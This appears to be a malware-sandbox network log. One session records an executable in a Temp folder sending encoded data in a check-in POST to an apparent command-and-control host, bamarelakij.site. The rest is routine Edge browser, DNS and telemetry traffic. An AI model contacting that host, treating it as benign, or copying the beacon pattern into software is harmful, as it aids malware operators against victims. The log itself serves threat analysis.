2025-01-09 13:55:28 UTC | 24 | IN | Data Raw: 31 32 0d 0a 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 90 0d 0a
Data Ascii: 12
2025-01-09 13:55:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49726 | 104.21.80.52 | 443 | 6712 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:29 UTC | 386 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: B5smxlJLNo14xsxDJtIvbZCH8YE
Content-Length: 208
Host: bamarelakij.site
2025-01-09 13:55:29 UTC | 768 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:55:29 GMT
Connection: close
pid: B5smxlJLNo14xsxDJtIvbZCH8YE
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I97jEp00xdeJLUK7PMUT7gYM%2BXRCwlrvQiRPs%2BsSp4IKOhSI%2FI7fxQFCLY6vmGcYr70zSK%2Bpa2k%2B9bzRlYhl3ut%2BilY6aVCJHkUv%2BY2oD1QNFhtfMElriMYSYwbN70wzNtwK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4ecdc3e3c8c36-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1838&rtt_var=711&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1230&delivery_rate=1516883&cwnd=166&unsent_bytes=0&cid=84fa1829da8f1d54&ts=310&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49831 | 162.159.61.3 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:42 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-09 13:55:42 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Thu, 09 Jan 2025 13:55:42 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8ff4ed3138b08c3c-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49830 | 172.64.41.3 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:42 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-09 13:55:42 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:42 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed312c864271-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49833 | 162.159.61.3 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
2025-01-09 13:55:43 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed345d507277-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49834 | 142.250.185.161 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:43 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:55:43 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          X-GUploader-UploadID: AFiumC60FXRFlnBRBQi3LEUQz5M9VCEpErAbNS4XBkrIk4uwQb-qy4IaP1uysfsIwpme-vjK
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 154477
                                                                                                                                                                                                                                                                          X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                                                                                                                          Date: Wed, 08 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                          Expires: Thu, 08 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                          Age: 79050
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                          ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                          Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49838 | 162.159.61.3 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:43 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
2025-01-09 13:55:43 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed36e82cefa1-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcomA)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49875 | 3.171.139.32 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:46 UTC | 925 | OUT | GET /b?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:55:46 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:46 GMT
                                                                                                                                                                                                                                                                          Location: /b2?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                          set-cookie: UID=1BB0012d778c190819b9e701736430946; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                          set-cookie: XID=1BB0012d778c190819b9e701736430946; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                          Via: 1.1 d0868637a3730c2afc20b3628b047a9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK52-P8
                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: qSVBeNqpeizYR-jC6RaTsVqR8wjeUnpub3w4WsvTj1zksJLPn0xalw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49874 | 13.89.178.27 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:55:46 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430943703&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 3857
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
                                                                                                                                                                                                                                                                          2025-01-09 13:55:46 UTC3857OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 35 3a 34 33 2e 36 39 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 66 39 38 66 61 31 63 2d 33 31 38 34 2d 34 61 62 64 2d 39 37 31 62 2d 30 62 61 32 34 36 35 33 37 62 66 37 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 30 32 36 33 38 31 30 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T13:55:43.698Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"5f98fa1c-3184-4abd-971b-0ba246537bf7","epoch":"1502638108"},"app":{"locale
2025-01-09 13:55:46 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=b209fb4490a14b5f851bfcc800941766&HASH=b209&LV=202501&V=4&LU=1736430946358; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:55:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          Set-Cookie: MS0=16076c41d4374a069e5be29d6239e265; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:25:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                          time-delta-millis: 2655
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:45 GMT
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                          10 | 192.168.2.8 | 49894 | 3.171.139.32 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC | 1012 | OUT | GET /b2?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: UID=1BB0012d778c190819b9e701736430946; XID=1BB0012d778c190819b9e701736430946
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:47 GMT
                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                          Via: 1.1 40185075b4d4551b3f16d587d961063c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK52-P8
                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: jesQiLpFKJYUs--5PZbcx1NJBawsJvD_rpjeaJ9qsAgSmTgadfyL0g==


                                                                                                                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                                          11 | 192.168.2.8 | 49895 | 131.253.33.203 | 443 | 5504 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC | 2137 | OUT | GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ntp.msn.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                          sec-ch-viewport-height: 876
                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                          sec-ch-viewport-width: 1232
                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                          downlink: 7.1
                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                          device-memory: 8
                                                                                                                                                                                                                                                                          rtt: 250
                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.2045.47"
                                                                                                                                                                                                                                                                          sec-ch-dpr: 1
                                                                                                                                                                                                                                                                          ect: 4g
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
                                                                                                                                                                                                                                                                          2025-01-09 13:55:47 UTC8412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Length: 53379
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Set-Cookie: _C_ETH=1; domain=.msn.com; path=/; secure; httponly
                                                                                                                                                                                                                                                                          Set-Cookie: _C_Auth=
                                                                                                                                                                                                                                                                          Set-Cookie: sptmarket_restored=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/
